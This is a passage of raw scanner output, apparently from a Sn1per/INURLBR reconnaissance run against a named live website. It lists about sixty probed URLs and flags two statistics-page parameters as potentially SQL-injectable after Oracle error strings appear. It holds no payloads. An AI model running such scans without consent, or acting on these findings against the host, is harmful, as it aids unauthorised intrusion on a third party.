10059Date: Sun, 06 Oct 2019 04:22:31 GMT
10060Server: Apache/2.4.10 (Debian)
10061Last-Modified: Wed, 13 Mar 2019 00:18:15 GMT
10062ETag: "a0d-583eebde65fc0"
10063Accept-Ranges: bytes
10064Content-Length: 2573
10065Vary: Accept-Encoding
10066Content-Type: text/html
10067
10068HTTP/1.1 200 OK
10069Date: Sun, 06 Oct 2019 04:22:32 GMT
10070Server: Apache/2.4.10 (Debian)
10071Last-Modified: Wed, 13 Mar 2019 00:18:15 GMT
10072ETag: "a0d-583eebde65fc0"
10073Accept-Ranges: bytes
10074Content-Length: 2573
10075Vary: Accept-Encoding
10076Content-Type: text/html
10077
10078Allow: GET,HEAD,POST,OPTIONS
10079#####################################################################################################################################
10080------------------------------------------------------------------------------------------------------------------------
10081
10082[ ! ] Starting SCANNER INURLBR 2.1 at [06-10-2019 00:22:55]
10083[ ! ] legal disclaimer: Usage of INURLBR for attacking targets without prior mutual consent is illegal.
10084It is the end user's responsibility to obey all applicable local, state and federal laws.
10085Developers assume no liability and are not responsible for any misuse or damage caused by this program
10086
10087[ INFO ][ OUTPUT FILE ]:: [ /usr/share/sniper/loot/workspace/www.ygmt.info/output/inurlbr-www.ygmt.info ]
10088[ INFO ][ DORK ]::[ site:www.ygmt.info ]
10089[ INFO ][ SEARCHING ]:: {
10090[ INFO ][ ENGINE ]::[ GOOGLE - www.google.ws ]
10091
10092[ INFO ][ SEARCHING ]::
10093-[:::]
10094[ INFO ][ ENGINE ]::[ GOOGLE API ]
10095
10096[ INFO ][ SEARCHING ]::
10097-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]
10098[ INFO ][ ENGINE ]::[ GOOGLE_GENERIC_RANDOM - www.google.com.mx ID: 005911257635119896548:iiolgmwf2se ]
10099
10100[ INFO ][ SEARCHING ]::
10101-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]
10102
10103[ INFO ][ TOTAL FOUND VALUES ]:: [ 100 ]
10104
10105
10106 _[ - ]::--------------------------------------------------------------------------------------------------------------
10107|_[ + ] [ 0 / 100 ]-[00:23:08] [ - ]
10108|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats ]
10109|_[ + ] Exploit::
10110|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
10111|_[ + ] More details:: / - / , ISP:
10112|_[ + ] Found:: UNIDENTIFIED
10113
10114 _[ - ]::--------------------------------------------------------------------------------------------------------------
10115|_[ + ] [ 1 / 100 ]-[00:23:08] [ - ]
10116|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?cat=Free Sites ]
10117|_[ + ] Exploit::
10118|_[ + ] Information Server:: HTTP/1.1 400 Bad Request, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
10119|_[ + ] More details:: / - / , ISP:
10120|_[ + ] Found:: UNIDENTIFIED
10121
10122 _[ - ]::--------------------------------------------------------------------------------------------------------------
10123|_[ + ] [ 2 / 100 ]-[00:23:09] [ - ]
10124|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=68 ]
10125|_[ + ] Exploit::
10126|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
10127|_[ + ] More details:: / - / , ISP:
10128|_[ + ] Found:: UNIDENTIFIED
10129
10130 _[ - ]::--------------------------------------------------------------------------------------------------------------
10131|_[ + ] [ 3 / 100 ]-[00:23:09] [ - ]
10132|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=40 ]
10133|_[ + ] Exploit::
10134|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
10135|_[ + ] More details:: / - / , ISP:
10136|_[ + ] Found:: UNIDENTIFIED
10137
10138 _[ - ]::--------------------------------------------------------------------------------------------------------------
10139|_[ + ] [ 4 / 100 ]-[00:23:10] [ - ]
10140|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=38 ]
10141|_[ + ] Exploit::
10142|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
10143|_[ + ] More details:: / - / , ISP:
10144|_[ + ] Found:: UNIDENTIFIED
10145
10146 _[ - ]::--------------------------------------------------------------------------------------------------------------
10147|_[ + ] [ 5 / 100 ]-[00:23:11] [ - ]
10148|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=108 ]
10149|_[ + ] Exploit::
10150|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
10151|_[ + ] More details:: / - / , ISP:
10152|_[ + ] Found:: UNIDENTIFIED
10153
10154 _[ - ]::--------------------------------------------------------------------------------------------------------------
10155|_[ + ] [ 6 / 100 ]-[00:23:12] [ - ]
10156|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=63 ]
10157|_[ + ] Exploit::
10158|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
10159|_[ + ] More details:: / - / , ISP:
10160|_[ + ] Found:: UNIDENTIFIED
10161
10162 _[ - ]::--------------------------------------------------------------------------------------------------------------
10163|_[ + ] [ 7 / 100 ]-[00:23:12] [ - ]
10164|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=93 ]
10165|_[ + ] Exploit::
10166|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
10167|_[ + ] More details:: / - / , ISP:
10168|_[ + ] Found:: UNIDENTIFIED
10169
10170 _[ - ]::--------------------------------------------------------------------------------------------------------------
10171|_[ + ] [ 8 / 100 ]-[00:23:13] [ - ]
10172|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=92 ]
10173|_[ + ] Exploit::
10174|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
10175|_[ + ] More details:: / - / , ISP:
10176|_[ + ] Found:: UNIDENTIFIED
10177
10178 _[ - ]::--------------------------------------------------------------------------------------------------------------
10179|_[ + ] [ 9 / 100 ]-[00:23:14] [ - ]
10180|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=1 ]
10181|_[ + ] Exploit::
10182|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
10183|_[ + ] More details:: / - / , ISP:
10184|_[ + ] Found:: UNIDENTIFIED
10185
10186 _[ - ]::--------------------------------------------------------------------------------------------------------------
10187|_[ + ] [ 10 / 100 ]-[00:23:14] [ - ]
10188|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=37 ]
10189|_[ + ] Exploit::
10190|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
10191|_[ + ] More details:: / - / , ISP:
10192|_[ + ] Found:: UNIDENTIFIED
10193
10194 _[ - ]::--------------------------------------------------------------------------------------------------------------
10195|_[ + ] [ 11 / 100 ]-[00:23:15] [ - ]
10196|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=107 ]
10197|_[ + ] Exploit::
10198|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
10199|_[ + ] More details:: / - / , ISP:
10200|_[ + ] Found:: UNIDENTIFIED
10201
10202 _[ - ]::--------------------------------------------------------------------------------------------------------------
10203|_[ + ] [ 12 / 100 ]-[00:23:16] [ - ]
10204|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=5 ]
10205|_[ + ] Exploit::
10206|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
10207|_[ + ] More details:: / - / , ISP:
10208|_[ + ] Found:: UNIDENTIFIED
10209
10210 _[ - ]::--------------------------------------------------------------------------------------------------------------
10211|_[ + ] [ 13 / 100 ]-[00:23:17] [ - ]
10212|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=2 ]
10213|_[ + ] Exploit::
10214|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
10215|_[ + ] More details:: / - / , ISP:
10216|_[ + ] Found:: UNIDENTIFIED
10217
10218 _[ - ]::--------------------------------------------------------------------------------------------------------------
10219|_[ + ] [ 14 / 100 ]-[00:23:17] [ - ]
10220|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=15 ]
10221|_[ + ] Exploit::
10222|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
10223|_[ + ] More details:: / - / , ISP:
10224|_[ + ] Found:: UNIDENTIFIED
10225
10226 _[ - ]::--------------------------------------------------------------------------------------------------------------
10227|_[ + ] [ 15 / 100 ]-[00:23:18] [ - ]
10228|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=95 ]
10229|_[ + ] Exploit::
10230|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
10231|_[ + ] More details:: / - / , ISP:
10232|_[ + ] Found:: UNIDENTIFIED
10233
10234 _[ - ]::--------------------------------------------------------------------------------------------------------------
10235|_[ + ] [ 16 / 100 ]-[00:23:19] [ - ]
10236|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=29 ]
10237|_[ + ] Exploit::
10238|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
10239|_[ + ] More details:: / - / , ISP:
10240|_[ + ] Found:: UNIDENTIFIED
10241
10242 _[ - ]::--------------------------------------------------------------------------------------------------------------
10243|_[ + ] [ 17 / 100 ]-[00:23:19] [ - ]
10244|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=46 ]
10245|_[ + ] Exploit::
10246|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
10247|_[ + ] More details:: / - / , ISP:
10248|_[ + ] Found:: UNIDENTIFIED
10249
10250 _[ - ]::--------------------------------------------------------------------------------------------------------------
10251|_[ + ] [ 18 / 100 ]-[00:23:20] [ - ]
10252|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=66 ]
10253|_[ + ] Exploit::
10254|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
10255|_[ + ] More details:: / - / , ISP:
10256|_[ + ] Found:: UNIDENTIFIED
10257
10258 _[ - ]::--------------------------------------------------------------------------------------------------------------
10259|_[ + ] [ 19 / 100 ]-[00:23:21] [ - ]
10260|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=50 ]
10261|_[ + ] Exploit::
10262|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
10263|_[ + ] More details:: / - / , ISP:
10264|_[ + ] Found:: UNIDENTIFIED
10265
10266 _[ - ]::--------------------------------------------------------------------------------------------------------------
10267|_[ + ] [ 20 / 100 ]-[00:23:21] [ - ]
10268|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=39 ]
10269|_[ + ] Exploit::
10270|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
10271|_[ + ] More details:: / - / , ISP:
10272|_[ + ] Found:: UNIDENTIFIED
10273
10274 _[ - ]::--------------------------------------------------------------------------------------------------------------
10275|_[ + ] [ 21 / 100 ]-[00:23:22] [ - ]
10276|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=22 ]
10277|_[ + ] Exploit::
10278|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
10279|_[ + ] More details:: / - / , ISP:
10280|_[ + ] Found:: UNIDENTIFIED
10281
10282 _[ - ]::--------------------------------------------------------------------------------------------------------------
10283|_[ + ] [ 22 / 100 ]-[00:23:23] [ - ]
10284|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=75 ]
10285|_[ + ] Exploit::
10286|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
10287|_[ + ] More details:: / - / , ISP:
10288|_[ + ] Found:: UNIDENTIFIED
10289
10290 _[ - ]::--------------------------------------------------------------------------------------------------------------
10291|_[ + ] [ 23 / 100 ]-[00:23:23] [ - ]
10292|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=31 ]
10293|_[ + ] Exploit::
10294|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
10295|_[ + ] More details:: / - / , ISP:
10296|_[ + ] Found:: UNIDENTIFIED
10297
10298 _[ - ]::--------------------------------------------------------------------------------------------------------------
10299|_[ + ] [ 24 / 100 ]-[00:23:24] [ - ]
10300|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=61 ]
10301|_[ + ] Exploit::
10302|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
10303|_[ + ] More details:: / - / , ISP:
10304|_[ + ] Found:: UNIDENTIFIED
10305
10306 _[ - ]::--------------------------------------------------------------------------------------------------------------
10307|_[ + ] [ 25 / 100 ]-[00:23:25] [ - ]
10308|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=64 ]
10309|_[ + ] Exploit::
10310|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
10311|_[ + ] More details:: / - / , ISP:
10312|_[ + ] Found:: UNIDENTIFIED
10313
10314 _[ - ]::--------------------------------------------------------------------------------------------------------------
10315|_[ + ] [ 26 / 100 ]-[00:23:25] [ - ]
10316|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=83 ]
10317|_[ + ] Exploit::
10318|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
10319|_[ + ] More details:: / - / , ISP:
10320|_[ + ] Found:: UNIDENTIFIED
10321
10322 _[ - ]::--------------------------------------------------------------------------------------------------------------
10323|_[ + ] [ 27 / 100 ]-[00:23:26] [ - ]
10324|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=58 ]
10325|_[ + ] Exploit::
10326|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
10327|_[ + ] More details:: / - / , ISP:
10328|_[ + ] Found:: UNIDENTIFIED
10329
10330 _[ - ]::--------------------------------------------------------------------------------------------------------------
10331|_[ + ] [ 28 / 100 ]-[00:23:27] [ - ]
10332|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=76 ]
10333|_[ + ] Exploit::
10334|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
10335|_[ + ] More details:: / - / , ISP:
10336|_[ + ] Found:: UNIDENTIFIED
10337
10338 _[ - ]::--------------------------------------------------------------------------------------------------------------
10339|_[ + ] [ 29 / 100 ]-[00:23:28] [ - ]
10340|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=3 ]
10341|_[ + ] Exploit::
10342|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
10343|_[ + ] More details:: / - / , ISP:
10344|_[ + ] Found:: UNIDENTIFIED
10345
10346 _[ - ]::--------------------------------------------------------------------------------------------------------------
10347|_[ + ] [ 30 / 100 ]-[00:23:28] [ - ]
10348|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=21 ]
10349|_[ + ] Exploit::
10350|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
10351|_[ + ] More details:: / - / , ISP:
10352|_[ + ] Found:: UNIDENTIFIED
10353
10354 _[ - ]::--------------------------------------------------------------------------------------------------------------
10355|_[ + ] [ 31 / 100 ]-[00:23:29] [ ! ]
10356|_[ + ] Target:: [ ( POTENTIALLY VULNERABLE ) http://www.ygmt.info/top50/index.php?a=stats&u=34 ]
10357|_[ + ] Exploit::
10358|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
10359|_[ + ] More details:: / - / , ISP:
10360|_[ + ] Found:: ORACLE-03 - VALUE: ORA-
10361|_[ + ] VALUE SAVED IN THE FILE:: inurlbr-www.ygmt.info
10362
10363 _[ - ]::--------------------------------------------------------------------------------------------------------------
10364|_[ + ] [ 32 / 100 ]-[00:23:30] [ - ]
10365|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=49 ]
10366|_[ + ] Exploit::
10367|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
10368|_[ + ] More details:: / - / , ISP:
10369|_[ + ] Found:: UNIDENTIFIED
10370
10371 _[ - ]::--------------------------------------------------------------------------------------------------------------
10372|_[ + ] [ 33 / 100 ]-[00:23:31] [ - ]
10373|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=6 ]
10374|_[ + ] Exploit::
10375|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
10376|_[ + ] More details:: / - / , ISP:
10377|_[ + ] Found:: UNIDENTIFIED
10378
10379 _[ - ]::--------------------------------------------------------------------------------------------------------------
10380|_[ + ] [ 34 / 100 ]-[00:23:31] [ - ]
10381|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=51 ]
10382|_[ + ] Exploit::
10383|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
10384|_[ + ] More details:: / - / , ISP:
10385|_[ + ] Found:: UNIDENTIFIED
10386
10387 _[ - ]::--------------------------------------------------------------------------------------------------------------
10388|_[ + ] [ 35 / 100 ]-[00:23:32] [ - ]
10389|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=33 ]
10390|_[ + ] Exploit::
10391|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
10392|_[ + ] More details:: / - / , ISP:
10393|_[ + ] Found:: UNIDENTIFIED
10394
10395 _[ - ]::--------------------------------------------------------------------------------------------------------------
10396|_[ + ] [ 36 / 100 ]-[00:23:33] [ - ]
10397|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=86 ]
10398|_[ + ] Exploit::
10399|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
10400|_[ + ] More details:: / - / , ISP:
10401|_[ + ] Found:: UNIDENTIFIED
10402
10403 _[ - ]::--------------------------------------------------------------------------------------------------------------
10404|_[ + ] [ 37 / 100 ]-[00:23:34] [ - ]
10405|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=30 ]
10406|_[ + ] Exploit::
10407|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
10408|_[ + ] More details:: / - / , ISP:
10409|_[ + ] Found:: UNIDENTIFIED
10410
10411 _[ - ]::--------------------------------------------------------------------------------------------------------------
10412|_[ + ] [ 38 / 100 ]-[00:23:35] [ - ]
10413|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=43 ]
10414|_[ + ] Exploit::
10415|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
10416|_[ + ] More details:: / - / , ISP:
10417|_[ + ] Found:: UNIDENTIFIED
10418
10419 _[ - ]::--------------------------------------------------------------------------------------------------------------
10420|_[ + ] [ 39 / 100 ]-[00:23:35] [ - ]
10421|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=88 ]
10422|_[ + ] Exploit::
10423|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
10424|_[ + ] More details:: / - / , ISP:
10425|_[ + ] Found:: UNIDENTIFIED
10426
10427 _[ - ]::--------------------------------------------------------------------------------------------------------------
10428|_[ + ] [ 40 / 100 ]-[00:23:36] [ - ]
10429|_[ + ] Target:: [ http://www.ygmt.info/top/index.php?a=stats&u=62 ]
10430|_[ + ] Exploit::
10431|_[ + ] Information Server:: HTTP/1.1 404 Not Found, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
10432|_[ + ] More details:: / - / , ISP:
10433|_[ + ] Found:: UNIDENTIFIED
10434
10435 _[ - ]::--------------------------------------------------------------------------------------------------------------
10436|_[ + ] [ 41 / 100 ]-[00:23:37] [ - ]
10437|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=80 ]
10438|_[ + ] Exploit::
10439|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
10440|_[ + ] More details:: / - / , ISP:
10441|_[ + ] Found:: UNIDENTIFIED
10442
10443 _[ - ]::--------------------------------------------------------------------------------------------------------------
10444|_[ + ] [ 42 / 100 ]-[00:23:37] [ - ]
10445|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=55 ]
10446|_[ + ] Exploit::
10447|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
10448|_[ + ] More details:: / - / , ISP:
10449|_[ + ] Found:: UNIDENTIFIED
10450
10451 _[ - ]::--------------------------------------------------------------------------------------------------------------
10452|_[ + ] [ 43 / 100 ]-[00:23:38] [ - ]
10453|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=11 ]
10454|_[ + ] Exploit::
10455|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
10456|_[ + ] More details:: / - / , ISP:
10457|_[ + ] Found:: UNIDENTIFIED
10458
10459 _[ - ]::--------------------------------------------------------------------------------------------------------------
10460|_[ + ] [ 44 / 100 ]-[00:23:39] [ - ]
10461|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=14 ]
10462|_[ + ] Exploit::
10463|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
10464|_[ + ] More details:: / - / , ISP:
10465|_[ + ] Found:: UNIDENTIFIED
10466
10467 _[ - ]::--------------------------------------------------------------------------------------------------------------
10468|_[ + ] [ 45 / 100 ]-[00:23:40] [ - ]
10469|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=19 ]
10470|_[ + ] Exploit::
10471|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
10472|_[ + ] More details:: / - / , ISP:
10473|_[ + ] Found:: UNIDENTIFIED
10474
10475 _[ - ]::--------------------------------------------------------------------------------------------------------------
10476|_[ + ] [ 46 / 100 ]-[00:23:41] [ - ]
10477|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=98 ]
10478|_[ + ] Exploit::
10479|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
10480|_[ + ] More details:: / - / , ISP:
10481|_[ + ] Found:: UNIDENTIFIED
10482
10483 _[ - ]::--------------------------------------------------------------------------------------------------------------
10484|_[ + ] [ 47 / 100 ]-[00:23:41] [ - ]
10485|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=82 ]
10486|_[ + ] Exploit::
10487|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
10488|_[ + ] More details:: / - / , ISP:
10489|_[ + ] Found:: UNIDENTIFIED
10490
10491 _[ - ]::--------------------------------------------------------------------------------------------------------------
10492|_[ + ] [ 48 / 100 ]-[00:23:42] [ - ]
10493|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=74 ]
10494|_[ + ] Exploit::
10495|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
10496|_[ + ] More details:: / - / , ISP:
10497|_[ + ] Found:: UNIDENTIFIED
10498
10499 _[ - ]::--------------------------------------------------------------------------------------------------------------
10500|_[ + ] [ 49 / 100 ]-[00:23:43] [ - ]
10501|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=100 ]
10502|_[ + ] Exploit::
10503|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
10504|_[ + ] More details:: / - / , ISP:
10505|_[ + ] Found:: UNIDENTIFIED
10506
10507 _[ - ]::--------------------------------------------------------------------------------------------------------------
10508|_[ + ] [ 50 / 100 ]-[00:23:44] [ - ]
10509|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=25 ]
10510|_[ + ] Exploit::
10511|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
10512|_[ + ] More details:: / - / , ISP:
10513|_[ + ] Found:: UNIDENTIFIED
10514
10515 _[ - ]::--------------------------------------------------------------------------------------------------------------
10516|_[ + ] [ 51 / 100 ]-[00:23:44] [ - ]
10517|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=augustagrenier ]
10518|_[ + ] Exploit::
10519|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
10520|_[ + ] More details:: / - / , ISP:
10521|_[ + ] Found:: UNIDENTIFIED
10522
10523 _[ - ]::--------------------------------------------------------------------------------------------------------------
10524|_[ + ] [ 52 / 100 ]-[00:23:45] [ - ]
10525|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=56 ]
10526|_[ + ] Exploit::
10527|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
10528|_[ + ] More details:: / - / , ISP:
10529|_[ + ] Found:: UNIDENTIFIED
10530
10531 _[ - ]::--------------------------------------------------------------------------------------------------------------
10532|_[ + ] [ 53 / 100 ]-[00:23:46] [ - ]
10533|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=17 ]
10534|_[ + ] Exploit::
10535|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
10536|_[ + ] More details:: / - / , ISP:
10537|_[ + ] Found:: UNIDENTIFIED
10538
10539 _[ - ]::--------------------------------------------------------------------------------------------------------------
10540|_[ + ] [ 54 / 100 ]-[00:23:46] [ - ]
10541|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=26 ]
10542|_[ + ] Exploit::
10543|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
10544|_[ + ] More details:: / - / , ISP:
10545|_[ + ] Found:: UNIDENTIFIED
10546
10547 _[ - ]::--------------------------------------------------------------------------------------------------------------
10548|_[ + ] [ 55 / 100 ]-[00:23:47] [ - ]
10549|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=44 ]
10550|_[ + ] Exploit::
10551|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
10552|_[ + ] More details:: / - / , ISP:
10553|_[ + ] Found:: UNIDENTIFIED
10554
10555 _[ - ]::--------------------------------------------------------------------------------------------------------------
10556|_[ + ] [ 56 / 100 ]-[00:23:48] [ ! ]
10557|_[ + ] Target:: [ ( POTENTIALLY VULNERABLE ) http://www.ygmt.info/top50/index.php?a=stats&u=60 ]
10558|_[ + ] Exploit::
10559|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
10560|_[ + ] More details:: / - / , ISP:
10561|_[ + ] Found:: ORACLE-03 - VALUE: ORA-
10562|_[ + ] VALUE SAVED IN THE FILE:: inurlbr-www.ygmt.info
10563
10564 _[ - ]::--------------------------------------------------------------------------------------------------------------
10565|_[ + ] [ 57 / 100 ]-[00:23:49] [ - ]
10566|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=45 ]
10567|_[ + ] Exploit::
10568|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
10569|_[ + ] More details:: / - / , ISP:
10570|_[ + ] Found:: UNIDENTIFIED
10571
10572 _[ - ]::--------------------------------------------------------------------------------------------------------------
10573|_[ + ] [ 58 / 100 ]-[00:23:49] [ - ]
10574|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=16 ]
10575|_[ + ] Exploit::
10576|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
10577|_[ + ] More details:: / - / , ISP:
10578|_[ + ] Found:: UNIDENTIFIED
10579
